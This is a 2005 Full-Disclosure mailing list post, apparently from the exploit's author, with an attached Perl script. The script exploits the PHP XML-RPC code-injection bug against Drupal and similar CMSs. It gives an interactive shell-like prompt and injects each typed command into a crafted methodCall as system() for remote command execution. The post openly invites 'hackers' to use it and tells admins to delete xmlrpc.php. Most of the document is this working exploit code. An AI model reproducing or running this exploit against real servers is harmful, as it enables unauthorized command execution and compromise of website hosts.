'[Full-disclosure] xmlrpc exploit'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] xmlrpc exploit
From:       <your_grand_momma () hushmail ! com>
Date:       2005-06-30 23:59:23
Message-ID: 20050630235926.75DAE33C23 () mailserver5 ! hushmail ! com
[Download RAW message or body]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


 Instructions

 hackers: go and exploit.
 admins: go and remove xmlrpc.php
 both: have fun

 ilo--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkLEh1AACgkQyVWFTD0n8MKDSACfTfJK52BDYuopZeugYTGmYzLCD3wA
n1JXFdAxsdH38/nGYE+uAnVzxw4c
=gEcs
-----END PGP SIGNATURE-----


["xmlrpc.pl" (application/octet-stream)]

#!/usr/bin/perl
# 
#  ilo-- 
#
#  This program is no GPL or has nothing to do with FSF, but some
#  code was ripped from romansoft.. sorry, too lazy!
#  
#  xmlrpc bug by James from GulfTech Security Research. 
#  http://pear.php.net/bugs/bug.php?id=4692
#  xmlrpc drupal exploit, but James sais xoops, phpnuke and other
#  cms should be vulnerable.
#
#  greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1;  # fflush stdout after print

# Default options
# connection 
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;
 
 #informational lines to feed my own ego.
 print "xmlrpc exploit - http://www.reversing.org \n";
 print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
 print "special chars allowed are / and - \n\n";

 # read command line options
 my $options = GetOptions (

 #general options
 'host=s'    => \$host, # input host to test.

 # connection options
 'basic_auth_user=s' => \$basic_auth_user,
 'basic_auth_pass=s' => \$basic_auth_pass,
 'proxy=s'           => \$proxy,
 'proxy_user=s'      => \$proxy_user,
 'proxy_pass=s'      => \$proxy_pass,
 'timeout=i'         => \$conn_timeout);

 # command line sanity check 
 &show_usage unless ($host);

 # main loop 
 while (1){
 	print "\nxmlrpc@# ";
 	my $cmd = <STDIN>;
 	xmlrpc_xploit ($cmd);
 }

 exit (1);

#exploit 
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;

my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');"; \
 my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

  $data =~ s/-/'.chr(45).'/mg;
  $data =~ s/\//'.char(47).'/mg;

  my $req = new HTTP::Request 'POST' => $host;
  $req->content_type('application/xml');
  $req->content($d1.'system(\''.$data.'\')'.$d2);
  
  my $ua = new LWP::UserAgent;
  $ua->agent("xmlrpc exploit R/0.1");
  $ua->timeout($conn_timeout);

  if ($basic_auth_user){
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
  }
  if ($proxy){
    $ua->proxy(['http'] => $proxy);
    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
  }
 
  #send request, return null if not OK
  my $res = $ua->request($req);
  if ($res->is_success){
     $reply= $res->content;
  } else { 
     $reply = "";
  }
  $reply =~ /(.*).(<pre>warning.*)/mgsi;
  print ($1);
}

# show options 
sub show_usage {
  print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
  print "main options\n";
  print "connection options\n";
  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
  print "\t--basic_auth_user, --basic_auth_pass\n";
  print "\t--timeout \n";
  print "\nExample\n";
  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
  print "\n";
  exit(1);
}


["xmlrpc.pl.sig" (text/plain)]

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 2.4

wkYEABECAAYFAkLEhzgACgkQyVWFTD0n8MJQDQCgsk6a6ksm203192k+4EgFjV5EHR4A
oK9IavxNE9LobSw3fJB+Oq6dCGDx
=QmBv
-----END PGP SIGNATURE-----


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic